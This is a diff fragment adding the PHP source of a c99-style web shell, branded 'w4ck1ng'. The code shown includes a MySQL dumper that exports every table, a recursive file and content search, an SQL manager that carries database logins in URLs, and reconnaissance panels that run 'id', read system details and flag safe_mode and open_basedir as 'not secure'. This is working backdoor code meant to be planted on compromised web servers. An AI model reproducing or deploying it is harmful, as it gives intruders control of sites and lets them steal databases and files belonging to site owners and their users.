+function parsesort($sort)
+{
+ $one = intval($sort);
+ $second = substr($sort,-1);
+ if ($second != "d") {$second = "a";}
+ return array($one,$second);
+}
+}
+if (!function_exists("view_perms_color"))
+{
+function view_perms_color($o)
+{
+ if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
+ elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}
+ else {return "<font color=green>".view_perms(fileperms($o))."</font>";}
+}
+}
+if (!function_exists("mysql_dump")){
+function mysql_dump($set)
+{
+ global $shver;
+ $sock = $set["sock"];
+ $db = $set["db"];
+ $print = $set["print"];
+ $nl2br = $set["nl2br"];
+ $file = $set["file"];
+ $add_drop = $set["add_drop"];
+ $tabs = $set["tabs"];
+ $onlytabs = $set["onlytabs"];
+ $ret = array();
+ $ret["err"] = array();
+ if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
+ if (empty($db)) {$db = "db";}
+ if (empty($print)) {$print = 0;}
+ if (empty($nl2br)) {$nl2br = 0;}
+ if (empty($add_drop)) {$add_drop = TRUE;}
+ if (empty($file))
+ {
+  $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
+ }
+ if (!is_array($tabs)) {$tabs = array();}
+ if (empty($add_drop)) {$add_drop = TRUE;}
+ if (sizeof($tabs) == 0)
+ {
+  // retrive tables-list
+  $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
+  if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
+ }
+ $out = "# Dumped by ".$shver."
+# Home page: http://w4ck1ng.com
+#
+# Host settings:
+# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
+# Date: ".date("d.m.Y H:i:s")."
+# DB: \"".$db."\"
+#---------------------------------------------------------
+";
+ $c = count($onlytabs);
+ foreach($tabs as $tab)
+ {
+  if ((in_array($tab,$onlytabs)) or (!$c))
+  {
+   if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
+   // recieve query for create table structure
+   $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
+   if (!$res) {$ret["err"][] = mysql_smarterror();}
+   else
+   {
+    $row = mysql_fetch_row($res);
+    $out .= $row["1"].";\n\n";
+    // recieve table variables
+    $res = mysql_query("SELECT * FROM `$tab`", $sock);
+    if (mysql_num_rows($res) > 0)
+    {
+     while ($row = mysql_fetch_assoc($res))
+     {
+      $keys = implode("`, `", array_keys($row));
+      $values = array_values($row);
+      foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+      $values = implode("', '", $values);
+      $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
+      $out .= $sql;
+     }
+    }
+   }
+  }
+ }
+ $out .= "#---------------------------------------------------------------------------------\n\n";
+ if ($file)
+ {
+  $fp = fopen($file, "w");
+  if (!$fp) {$ret["err"][] = 2;}
+  else
+  {
+   fwrite ($fp, $out);
+   fclose ($fp);
+  }
+ }
+ if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
+ return $out;
+}
+}
+if (!function_exists("mysql_buildwhere"))
+{
+function mysql_buildwhere($array,$sep=" and",$functs=array())
+{
+ if (!is_array($array)) {$array = array();}
+ $result = "";
+ foreach($array as $k=>$v)
+ {
+  $value = "";
+  if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
+  $value .= "'".addslashes($v)."'";
+  if (!empty($functs[$k])) {$value .= ")";}
+  $result .= "`".$k."` = ".$value.$sep;
+ }
+ $result = substr($result,0,strlen($result)-strlen($sep));
+ return $result;
+}
+}
+if (!function_exists("mysql_fetch_all"))
+{
+function mysql_fetch_all($query,$sock)
+{
+ if ($sock) {$result = mysql_query($query,$sock);}
+ else {$result = mysql_query($query);}
+ $array = array();
+ while ($row = mysql_fetch_array($result)) {$array[] = $row;}
+ mysql_free_result($result);
+ return $array;
+}
+}
+if (!function_exists("mysql_smarterror"))
+{
+function mysql_smarterror($type,$sock)
+{
+ if ($sock) {$error = mysql_error($sock);}
+ else {$error = mysql_error();}
+ $error = htmlspecialchars($error);
+ return $error;
+}
+}
+if (!function_exists("mysql_query_form"))
+{
+function mysql_query_form()
+{
+ global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
+ if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+ if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+ if ((!$submit) or ($sql_act))
+ {
+  echo "<table border=0><tr><td><form name=\"c99sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>";
+  if ($tbl_struct)
+  {
+   echo "<td valign=\"top\"><b>Fields:</b><br>";
+   foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "?<a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
+   echo "</td></tr></table>";
+  }
+ }
+ if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
+}
+}
+if (!function_exists("mysql_create_db"))
+{
+function mysql_create_db($db,$sock="")
+{
+ $sql = "CREATE DATABASE `".addslashes($db)."`;";
+ if ($sock) {return mysql_query($sql,$sock);}
+ else {return mysql_query($sql);}
+}
+}
+if (!function_exists("mysql_query_parse"))
+{
+function mysql_query_parse($query)
+{
+ $query = trim($query);
+ $arr = explode (" ",$query);
+ /*array array()
+ {
+  "METHOD"=>array(output_type),
+  "METHOD1"...
+  ...
+ }
+ if output_type == 0, no output,
+ if output_type == 1, no output if no error
+ if output_type == 2, output without control-buttons
+ if output_type == 3, output with control-buttons
+ */
+ $types = array(
+  "SELECT"=>array(3,1),
+  "SHOW"=>array(2,1),
+  "DELETE"=>array(1),
+  "DROP"=>array(1)
+ );
+ $result = array();
+ $op = strtoupper($arr[0]);
+ if (is_array($types[$op]))
+ {
+  $result["propertions"] = $types[$op];
+  $result["query"]  = $query;
+  if ($types[$op] == 2)
+  {
+   foreach($arr as $k=>$v)
+   {
+    if (strtoupper($v) == "LIMIT")
+    {
+     $result["limit"] = $arr[$k+1];
+     $result["limit"] = explode(",",$result["limit"]);
+     if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
+     unset($arr[$k],$arr[$k+1]);
+    }
+   }
+  }
+ }
+ else {return FALSE;}
+}
+}
+if (!function_exists("c99fsearch"))
+{
+function c99fsearch($d)
+{
+ global $found;
+ global $found_d;
+ global $found_f;
+ global $search_i_f;
+ global $search_i_d;
+ global $a;
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+ $h = opendir($d);
+ while (($f = readdir($h)) !== FALSE)
+ {
+  if($f != "." && $f != "..")
+  {
+   $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
+   if (is_dir($d.$f))
+   {
+    $search_i_d++;
+    if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
+    if (!is_link($d.$f)) {c99fsearch($d.$f);}
+   }
+   else
+   {
+    $search_i_f++;
+    if ($bool)
+    {
+     if (!empty($a["text"]))
+     {
+      $r = @file_get_contents($d.$f);
+      if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
+      if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
+      if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
+      else {$bool = strpos(" ".$r,$a["text"],1);}
+      if ($a["text_not"]) {$bool = !$bool;}
+      if ($bool) {$found[] = $d.$f; $found_f++;}
+     }
+     else {$found[] = $d.$f; $found_f++;}
+    }
+   }
+  }
+ }
+ closedir($h);
+}
+}
+if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}}
+//Sending headers
+@ob_start();
+@ob_implicit_flush(0);
+function onphpshutdown()
+{
+ global $gzipencode,$ft;
+ if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad")))
+ {
+  $v = @ob_get_contents();
+  @ob_end_clean();
+  @ob_start("ob_gzHandler");
+  echo $v;
+  @ob_end_flush();
+ }
+}
+function c99shexit()
+{
+ onphpshutdown();
+ exit;
+}
+header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
+header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
+header("Cache-Control: no-store, no-cache, must-revalidate");
+header("Cache-Control: post-check=0, pre-check=0", FALSE);
+header("Pragma: no-cache");
+if (empty($tmpdir))
+{
+ $tmpdir = ini_get("upload_tmp_dir");
+ if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
+}
+$tmpdir = realpath($tmpdir);
+$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
+if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
+if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
+else {$tmpdir_logs = realpath($tmpdir_logs);}
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+ $safemode = TRUE;
+ $hsafemode = "<font color=red>ON (secure)</font>";
+}
+else {$safemode = FALSE; $hsafemode = "<font color=green>OFF (not secure)</font>";}
+$v = @ini_get("open_basedir");
+if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";}
+else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";}
+$sort = htmlspecialchars($sort);
+if (empty($sort)) {$sort = $sort_default;}
+$sort[1] = strtolower($sort[1]);
+$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
+if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
+$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE));
+@ini_set("highlight.bg",$highlight_bg); //FFFFFF
+@ini_set("highlight.comment",$highlight_comment); //#FF8000
+@ini_set("highlight.default",$highlight_default); //#0000BB
+@ini_set("highlight.html",$highlight_html); //#000000
+@ini_set("highlight.keyword",$highlight_keyword); //#007700
+@ini_set("highlight.string",$highlight_string); //#DD0000
+if (!is_array($actbox)) {$actbox = array();}
+$dspact = $act = htmlspecialchars($act);
+$disp_fullpath = $ls_arr = $notls = null;
+$ud = urlencode($d);
+?>
+
+<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title>shell@<?php echo getenv("HTTP_HOST"); ?></title><STYLE>
+TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}
+.style1 {
+	color: #FF0000;
+	font-weight: bold;
+}
+.style2 {font-size: -3}
+</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><div align="center"><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"></p>
+  <p><font size="-3"><span class="style2"></br>
+ <font color="#333333">k1ngw4ck1ng</font><font color="white">w</font><font color="#333333">4ck1</font><font color="white">ngw4ck1n</font><font color="#333333">gw4c</font><font color="white">k</font><font color="#333333">1ngw4ck</font><font color="white">1ngw</font><font color="#333333">4ck</font><font color="white">1</font><font color="#333333">ngw4ck1ngw4ck1ng</font><font color="white">w4</font><font color="#333333">ck1ngw4ck1</font><font color="white">n</font><font color="#333333">gw4ck1ngw</font><font color="white">4</font><font color="#333333">ck1ngw4ck1</font><font color="white">n</font><font color="#333333">gw4c</font><font color="white">k1ng</font><font color="#333333">w4ck1ngw4ck1ngw4ck1ngw4ck1ng</font><br>
+
+      <font color="#333333">w4ck1ngw4c</font><font color="white">k1n</font><font color="#333333">gw4ck</font><font color="white">1ngw4</font><font color="#333333">ck</font><font color="white">1ngw4ck1n</font><font color="#333333">gw</font><font color="white">4ck1n</font><font color="#333333">g</font><font color="white">w</font><font color="#333333">4ck1ngw4ck</font><font color="white">1ngw4</font><font color="#333333">ck</font><font color="white">1ng</font><font color="#333333">w4ck1n</font><font color="white">gw4ck1</font><font color="#333333">ngw4ck</font><font color="white">1n</font><font color="#333333">gw4ck1ngw</font><font color="white">4ck</font><font color="#333333">1ng</font><font color="white">w4ck</font><font color="#333333">1ngw4ck1ngw4ck1ngw4ck1ngw4ck</font><br>
+
+      <font color="#333333">1ngw4ck1ng</font><font color="white">w4ck</font><font color="#333333">1ngw</font><font color="white">4ck1</font><font color="#333333">ngw4</font><font color="white">ck1</font><font color="#333333">ng</font><font color="white">w4c</font><font color="#333333">k1</font><font color="white">ngw4</font><font color="#333333">c</font><font color="white">k1</font><font color="#333333">ngw</font><font color="white">4</font><font color="#333333">ck</font><font color="white">1ngw4ck1ng</font><font color="#333333">w</font><font color="white">4ck</font><font color="#333333">1ng</font><font color="white">w4ck1n</font><font color="#333333">gw4ck1ngw</font><font color="white">4ck</font><font color="#333333">1ngw4ck1</font><font color="white">ngw4</font><font color="#333333">c</font><font color="white">k1ngw</font><font color="#333333">4ck1n</font><font color="white">gw4ck1ngw4ck</font><font color="#333333">1ngw4ck1ngw</font><br>
+
+      <font color="#333333">4ck1ngw4ck1</font><font color="white">ngw4</font><font color="#333333">ck</font><font color="white">1ngw4</font><font color="#333333">ck1</font><font color="white">ngw4</font><font color="#333333">ck1ngw</font><font color="white">4ck1</font><font color="#333333">n</font><font color="white">gw4</font><font color="#333333">ck1</font><font color="white">ngw4ck</font><font color="#333333">1ngw4</font><font color="white">ck</font><font color="#333333">1</font><font color="white">ngw4ck1n</font><font color="#333333">gw4ck1ngw4ck</font><font color="white">1ngw</font><font color="#333333">4ck1ngw4</font><font color="white">ck1n</font><font color="#333333">g</font><font color="white">w4ck1ngw4ck</font><font color="#333333">1ngw4c</font><font color="white">k1ngw</font><font color="#333333">4ck1ngw4ck1</font><br>
+
+      <font color="#333333">ngw4ck1ngw4c</font><font color="white">k1ngw4ck1ng</font><font color="#333333">w4</font><font color="white">ck1n</font><font color="#333333">gw4ck1</font><font color="white">ngw4</font><font color="#333333">c</font><font color="white">k1ngw4ck1n</font><font color="#333333">gw4ck1n</font><font color="white">gw4ck1ngw4ck</font><font color="#333333">1ngw4ck1ng</font><font color="white">w4ck1</font><font color="#333333">ngw4ck1</font><font color="white">ngw4ck1ngw4ck1ng</font><font color="#333333">w4ck1ng</font><font color="white">w4ck1n</font><font color="#333333">gw4ck1ngw4</font><br>
+
+      <font color="#333333">ck1ngw4ck1ng</font><font color="white">w4ck1ngw</font><font color="#333333">4c</font><font color="white">k1ngw4c</font><font color="#333333">k1ng</font><font color="white">w4ck1ngw4c</font><font color="#333333">k1n</font><font color="white">gw4c</font><font color="#333333">k1ngw4c</font><font color="white">k1ngw4ck1ngw4ck</font><font color="#333333">1ngw4c</font><font color="white">k1</font><font color="#333333">n</font><font color="white">gw4</font><font color="#333333">ck1ngw4</font><font color="white">ck1ngw4ck1ngw4ck1ngw4ck1ngw</font><font color="#333333">4ck1ngw4ck1n</font><br>
+
+      <font color="#333333">gw4ck1ngw4ck1</font><font color="white">ngw4ck</font><font color="#333333">1ngw</font><font color="white">4ck1ng</font><font color="#333333">w4c</font><font color="white">k1ngw</font><font color="#333333">4</font><font color="white">ck1n</font><font color="#333333">gw4c</font><font color="white">k1ng</font><font color="#333333">w4ck1n</font><font color="white">gw4ck1ngw4ck1ngw4ck1</font><font color="#333333">ngw4ck</font><font color="white">1ng</font><font color="#333333">w4ck1n</font><font color="white">gw4</font><font color="#333333">c</font><font color="white">k1ngw4</font><font color="#333333">ck1</font><font color="white">ngw4</font><font color="#333333">ck1ngw4</font><font color="white">ck1</font><font color="#333333">ngw4ck1ngw4c</font><br>
+
+      <font color="#333333">k1ngw4ck1ngw4c</font><font color="white">k1ngw</font><font color="#333333">4ck1n</font><font color="white">gw4ck</font><font color="#333333">1ngw4ck1n</font><font color="white">gw4c</font><font color="#333333">k1ngw</font><font color="white">4ck1ngw4ck1n</font><font color="#333333">g</font><font color="white">w4ck1</font><font color="#333333">ngw4</font><font color="white">ck1ngw4ck</font><font color="#333333">1ngw</font><font color="white">4ck</font><font color="#333333">1ngw4c</font><font color="white">k1n</font><font color="#333333">gw</font><font color="white">4ck1</font><font color="#333333">ngw4ck1n</font><font color="white">g</font><font color="#333333">w4ck1n</font><font color="white">gw4c</font><font color="#333333">k1ngw4ck1ng</font><br>
+
+      <font color="#333333">w4ck1ngw4ck1ngw4</font><font color="white">ck1</font><font color="#333333">ngw4ck</font><font color="white">1ngw</font><font color="#333333">4ck1ngw4</font><font color="white">ck1ng</font><font color="#333333">w4ck1n</font><font color="white">gw4ck1ngw</font><font color="#333333">4ck1</font><font color="white">ngw4</font><font color="#333333">ck1ngw4ck</font><font color="white">1ngw4ck1ngw4c</font><font color="#333333">k1n</font><font color="white">gw4</font><font color="#333333">ck1n</font><font color="white">gw4</font><font color="#333333">ck1ngw4ck1ngw</font><font color="white">4ck1ng</font><font color="#333333">w4ck1ngw4ck</font><br>
+
+      <font color="#333333">1ngw4ck1ngw4ck1ngw4ck1ngw4</font><font color="white">c</font><font color="#333333">k1ngw4ck1ng</font><font color="white">w</font><font color="#333333">4ck1ngw4ck1ngw4ck1ngw4ck1n</font><font color="white">g</font><font color="#333333">w4ck1ngw4c</font><font color="white">k1ngw4</font><font color="#333333">c</font><font color="white">k</font><font color="#333333">1ngw4c</font><font color="white">k1n</font><font color="#333333">gw4c</font><font color="white">k1n</font><font color="#333333">gw4ck1ngw4ck1ngw</font><font color="white">4ck1n</font><font color="#333333">gw4ck1ngw</font><br>
+
+      <font color="#333333">4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ng</font><font color="white">w4</font><font color="#333333">ck1ngw4ck1ngw4ck1n</font><font color="white">gw4ck</font><font color="#333333">1ngw4ck1</font><br>
+      <font color="#333333">ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1</font><font color="white">n</font><font color="#333333">gw4ck1ngw4ck1ngw4ck1ng</font><font color="white">w</font><font color="#333333">4ck1ngw4</font></br>
+  </span>&nbsp;</p></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>System Info:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><? echo "<b>Disabled functions</b>: <b>";
+if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";} ?><p align="left"><b>We are: <?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?><?php $curl_on = @function_exists('curl_version');
+echo "<br/>cURL: <b>".(($curl_on)?("<font color=green>ON</font>"):("<font color=red>OFF</font>")); ?></br><? if(@ini_get("register_globals")){$reg_g="<font color=green>ON</font>";}else{$reg_g="<font color=red>OFF</font>";} echo("<b>Register globals:</b> $reg_g"); ?><?php echo "<br/>MySQL: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){
+echo "<font color=green>ON</font>"; } else { echo "<font color=red>OFF</font>"; }
+echo "</b>";
+echo "<br/>MSSQL: <b>";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";} ?><?php echo "<br/>PostgreSQL: <b>";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";} ?><?php echo "<br/>Oracle: <b>";
+$ora_on = @function_exists('ocilogon');
+if($ora_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";} ?> </b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+$d = str_replace("\\\\","\\",$d);
+$dispd = htmlspecialchars($d);
+$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
+$i = 0;
+foreach($pd as $b)
+{
+ $t = "";
+ $j = 0;
+ foreach ($e as $r)
+ {
+  $t.= $r.DIRECTORY_SEPARATOR;
+  if ($j == $i) {break;}
+  $j++;
+ }
+ echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";
+ $i++;
+}
+echo "&nbsp;&nbsp;&nbsp;";
+if (is_writable($d))
+{
+ $wd = TRUE;
+ $wdt = "<font color=green>[ ok ]</font>";
+ echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";
+}
+else
+{
+ $wd = FALSE;
+ $wdt = "<font color=red>[ Read-Only ]</font>";
+ echo "<b>".view_perms_color($d)."</b>";
+}
+if (is_callable("disk_free_space"))
+{
+ $free = disk_free_space($d);
+ $total = disk_total_space($d);
+ if ($free === FALSE) {$free = 0;}
+ if ($total === FALSE) {$total = 0;}
+ if ($free < 0) {$free = 0;}
+ if ($total < 0) {$total = 0;}
+ $used = $total-$free;
+ $free_percent = round(100/($total/$free),2);
+ echo "<br><b>Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>";
+
+}
+echo "<br>";
+echo "<b>Your ip: <a href=http://".$_SERVER["REMOTE_ADDR"].">".$_SERVER["REMOTE_ADDR"]."</a> - Server ip: <a href=http://".gethostbyname($_SERVER["HTTP_HOST"]).">".gethostbyname($_SERVER["HTTP_HOST"])."</a></b><br/>";
+$letters = "";
+if ($win)
+{
+ $v = explode("\\",$d);
+ $v = $v[0];
+ foreach (range("a","z") as $letter)
+ {
+  $bool = $isdiskette = in_array($letter,$safemode_diskettes);
+  if (!$bool) {$bool = is_dir($letter.":\\");}
+  if ($bool)
+  {
+   $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ ";
+   if ($letter.":" != $v) {$letters .= $letter;}
+   else {$letters .= "<font color=green>".$letter."</font>";}
+   $letters .= " ]</a> ";
+  }
+ }
+ if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";}
+}
+if (count($quicklaunch) > 0)
+{
+ foreach($quicklaunch as $item)
+ {
+  $item[1] = str_replace("%d",urlencode($d),$item[1]);
+  $item[1] = str_replace("%sort",$sort,$item[1]);
+  $v = realpath($d."..");
+  if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);}
+  $item[1] = str_replace("%upd",urlencode($v),$item[1]);
+  echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;";
+ }
+}
+echo "</p></td></tr></table><br>";
+if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";}
+echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">";
+if ($act == "") {$act = $dspact = "ls";}
+if ($act == "sql")
+{
+ $sql_surl = $surl."act=sql";
+ if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
+ if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
+ if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
+ if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
+ if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
+ $sql_surl .= "&";
+ ?><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php
+ if ($sql_server)
+ {
+  $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
+  $err = mysql_smarterror();
+  @mysql_select_db($sql_db,$sql_sock);
+  if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
+ }
+ else {$sql_sock = FALSE;}
+ echo "<b>SQL Manager:</b><br>";
+ if (!$sql_sock)
+ {
+  if (!$sql_server) {echo "NO CONNECTION";}
+  else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
+ }
+ else
+ {
+  $sqlquicklaunch = array();
+  $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
+  $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
+  $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
+  $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
